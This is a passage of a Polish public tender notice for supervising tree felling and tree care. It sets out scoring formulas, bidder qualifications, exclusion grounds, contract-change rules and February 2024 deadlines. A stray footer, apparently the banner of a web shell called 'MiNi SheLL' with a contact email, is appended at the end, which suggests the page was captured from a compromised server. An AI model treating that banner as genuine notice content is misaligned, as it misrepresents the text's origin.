(Kd)	40%<br/>19.2 Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % <br/>Ocena: Łączna cena brutto za wykonanie przedmiotu zamówienia<br/>Wartość punktowa wyliczana jest wg wzoru:<br/> Kn<br/>Kc = -------- x R<br/> Kb<br/>Gdzie: <br/>Kc - liczba punktów ocenianej oferty dla kryterium ceny brutto za przedmiot zamówienia,<br/>Kn - cena oferty z najniższą ceną za przedmiot zamówienia,<br/>Kb - cena oferty za przedmiot zamówienia z badanej oferty,<br/>R - ranga kryterium ceny za usługi stanowiące przedmiot zamówienia (0,60).<br/><br/>19.3 Kryterium „Kwalifikacje i doświadczenie osoby wyznaczonej do realizacji zamówienia” (Kd) – waga 40,00 % <br/><br/>19.3.1 Zamawiający przyzna punkty Wykonawcy, który: <br/>1) wykaże w formularzu ofertowym - Załącznik nr 1 do SWZ: <br/>a)	kwalifikacje (wykształcenie) osoby wyznaczonej do realizacji zamówienia<br/>oraz <br/>b)	doświadczenie zawodowe osoby wyznaczonej do realizacji zamówienia w nadzorowaniu realizacji prac z zakresu wycinki i/lub pielęgnacji/korekty drzew w oparciu o ustawę z dnia 16 kwietnia 2004 r. o ochronie przyrody lub ustawę z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami.<br/><br/>Kwalifikacje i doświadczenie zawodowe podlegające ocenie w niniejszym kryterium muszą dotyczyć jednej i tej samej osoby.<br/>oraz<br/>2) załączy do formularza ofertowego dokumenty (referencje, zaświadczenia itp.) potwierdzające kwalifikacje i doświadczenie zawodowe wskazane w formularzu ofertowym - Załącznik nr 1 do SWZ <br/>Oświadczenia i dokumenty o którym mowa w ust. 19.3.1 pkt 1 i 2 należy podpisać kwalifikowanym podpisem elektronicznym, profilem zaufanym lub podpisem osobistym. <br/><br/>19.3.2 Wykonawca może otrzymać maksymalnie:<br/>1) 20 punktów za wykazane zgodnie z zasadami ust. 19.3.1 SWZ kwalifikacje zawodowe (wykształcenie), tj.:<br/>a)	za wykazanie wykształcenia średniego o kierunku leśnym – 10 pkt<br/>b)	za wykazanie wykształcenia wyższego o kierunku leśnym – 20 pkt <br/><br/>2) 10 punktów za wykazane zgodnie z zasadami ust. 19.3.1 SWZ doświadczenie zawodowe w nadzorowaniu realizacji prac z zakresu wycinki i/lub pielęgnacji/korekty drzew w oparciu o ustawę z dnia 16 kwietnia 2004 r. o ochronie przyrody, tj.: Zamawiający przyzna 1 punkt za każdy wykazany nadzór.<br/><br/>3) 10 punktów za wykazane zgodnie z zasadami ust. 19.3.1 SWZ doświadczenie zawodowe w nadzorowaniu realizacji prac z zakresu wycinki i/lub pielęgnacji/korekty drzew w oparciu o ustawę z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami, tj.: Zamawiający przyzna 1 punkt za każdy wykazany nadzór.<br/><br/>19.3.3 Zamawiający oceni oferty w niniejszym kryterium na podstawie informacji wskazanej przez Wykonawcę w formularzu ofertowym - Załącznik nr 1 do SWZ oraz załączonych dokumentów, o których mowa w ust. 19.3.1. pkt 2. W przypadku braku wymaganych informacji lub dokumentów Zamawiający przyzna Wykonawcy 0 pkt. w niniejszym kryterium. <br/><br/>19.4 Ocena końcowa oferty<br/>Suma punktów uzyskanych za wszystkie kryteria:<br/>Kc + Kd = Ocena końcowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje i doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>1)	dysponuje co najmniej osobą, skierowaną do realizacji zamówienia, która posiada następujące kwalifikacje i doświadczenie zawodowe tj.: <br/>a) posiada co najmniej wykształcenie średnie <br/>b) uzyskała przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie: ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody i/lub ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>albo<br/>przynajmniej przez 6 miesięcy nadzorowała prace w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach; <br/>c) wykonała przynajmniej 10 kwalifikacji drewna jako użytkowe bądź opałowe na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>d) wykonała przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni cały warunek samodzielnie, a każda z osób będzie dysponowała całym wymaganym doświadczeniem i kwalifikacjami.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz usług dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodne co do treści z Załącznikiem nr 2 do SWZ;<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych, tj.<br/>1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami potwierdzającego, iż wykonawca dysponuje co najmniej jedną osobą, która posiada następujące kwalifikacje i doświadczenie zawodowe tj.: <br/>a) posiada co najmniej wykształcenie średnie<br/>b) uzyskała przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie: ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody i/lub ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>albo<br/>przynajmniej przez 6 miesięcy nadzorowała prace w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach; <br/>c) wykonała przynajmniej 10 kwalifikacji drewna jako użytkowe bądź opałowe na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>d) wykonała przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.<br/>Wykaz osób należy sporządzić zgodnie co do treści z Załącznikiem nr 5 do SWZ, który zostanie udostępniony Wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 14.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>14.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postę-powaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>14.3 Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegają-cych się o udzielenie zamówienia. <br/>14.4 Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <br/>14.5 Opis sposobu spełniania warunków udziału w postępowaniu przez wykonawców wspólnie ubie-gających się o zamówienie zawarto w ust. 11 SWZ.<br/>14.6 W przypadku wspólnego ubiegania się o zamówienie (w tym prowadzący działalność w formie spółki cywilnej) każdy z wykonawców wspólnie ubiegających się musi dołączyć do oferty, oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 2 i 3 do SWZ. Oświadczenia te potwierdzają brak podstaw do wykluczenia, spełnianie warunków udziału w postępowaniu, w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia stanowią dowód potwierdzający brak podstaw wykluczenia, spełnienie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe.<br/>14.7 Wykonawcy wspólnie ubiegający się o zamówienie (w tym prowadzący działalność w formie spółki cywilnej) zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które części usługi wykonają – zgodnie co do treści z Załącznikiem nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku: <br/>1. zmian, o których mowa w art. 436 pkt 4 lit. b PZP, tj.:<br/>a)	stawki podatku od towarów i usług, o ile wykonawca jest płatnikiem podatku VAT,<br/>b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>2. zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia, o których mowa w art. 439 ust. 1 ustawy Prawo Zamówień Publicznych.<br/>Zasady wprowadzania zmian wysokości wynagrodzenia, w przypadkach o których mowa wyżej oraz pozostałych przypadkach opisano w projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy -<br/>stanowiących załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej pod adresem https://kowr.eb2b.com.pl/,</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4.1	Na podstawie art. 95 ustawy PZP, Zamawiający wymaga, a Wykonawca zobowiązuje się do realizacji przedmiotu umowy samodzielnie lub przez osobę zatrudnioną przez niego na podstawie umowy o pracę w rozumieniu przepisów Ustawy z dnia 26 czerwca 1974 r. Kodeks pracy, w zakresie realizacji czynności wymienionych w ust. 3.4 pkt 1-5 SWZ. <br/>4.2	Warunkiem dopuszczenia pracownika Wykonawcy do realizacji usług objętych umową jest przedłożenie Zamawiającemu najpóźniej w dniu rozpoczęcia realizacji przedmiotu umowy informacji na temat pracownika zatrudnionego na podstawie umowy o pracę, który będzie realizować usługi, w tym informacji: imię i nazwisko osoby, datę zawarcia umowy, podstawę zatrudnienia (rodzaj umowy o pracę), wymiar i okres zatrudnienia oraz zakres obowiązków pracownika. Wykonawca może powierzyć wykonywanie czynności będących przedmiotem umowy osobie spełniającej warunki udziału w postępowaniu, wskazane w ust. 11.2.4 SWZ<br/>4.3	Zamawiający dopuszcza w uzasadnionych przypadkach możliwość zmiany pracownika wyznaczonego przez Wykonawcę do wykonywania umowy w przypadku braku możliwości wykonywania przez tego pracownika czynności będących przedmiotem umowy (rozwiązanie umowy o pracę, śmierć, długotrwała choroba, inne uzasadnione okoliczności niepozwalające wykonywać wskazanej osobie powierzone czynności). Wykonawca może powierzyć wykonywanie czynności będących przedmiotem umowy osobie spełniającej co najmniej takie warunki jakie podano w specyfikacji warunków zamówienia (SWZ) dla przeprowadzonego postępowania.<br/>4.4	Celem umożliwienia Zamawiającemu weryfikacji spełnienia przez Wykonawcę obowiązku, o którym mowa w ust. 4.1, Wykonawca przekaże Zamawiającemu, na jego pisemne żądanie, w terminie wskazanym przez Zamawiającego, dokumenty wskazane w wezwaniu, weryfikujące zatrudnienie przez Wykonawcę, na podstawie umowy o pracę osoby wykonującej przedmiot umowy w imieniu Wykonawcy. Dokumentami weryfikującymi, których Zamawiający może żądać w szczególności są: oświadczenie zatrudnionego pracownika, oświadczenia Wykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę, poświadczona za zgodność z oryginałem kopia umowy o pracę zatrudnionego pracownika, inne dokumenty zawierające informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika. Każdy udostępniany Zamawiającemu dokument powinien zostać przeanalizowany przez Wykonawcę pod kątem celowości i adekwatności udostępnianych Zamawiającemu danych z zachowaniem przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako RODO. <br/>4.5	Przedstawiciel Zamawiającego lub pracownik ochrony uprawniony będzie do weryfikacji tożsamości pracownika Wykonawcy przed dopuszczeniem do realizacji umowy i weryfikacji z przekazanym Zamawiającemu wykazem osób, Zapis ten stosuje się odpowiednio do podwykonawców i ich pracowników. Brak możliwości ustalenia tożsamości pracownika Wykonawcy lub stwierdzenie, że osoba ta nie widnieje w wykazie stanowi podstawę niedopuszczenia jej do realizacji usług objętych umową, a co za tym idzie - naliczenia kary umownej. <br/>4.6	W przypadku osób prowadzących działalność gospodarczą, niezatrudniających pracowników, Zamawiający zastrzega, że czynności w zakresie realizacji przedmiotu zamówienia określone w ust. 3.4 pkt 1-5 SWZ wykonają osobiście osoby prowadzące tą działalność gospodarczą.<br/>4.7	Pozostałe informacje zawarto w projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy stanowiących załącznik nr 6 do SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com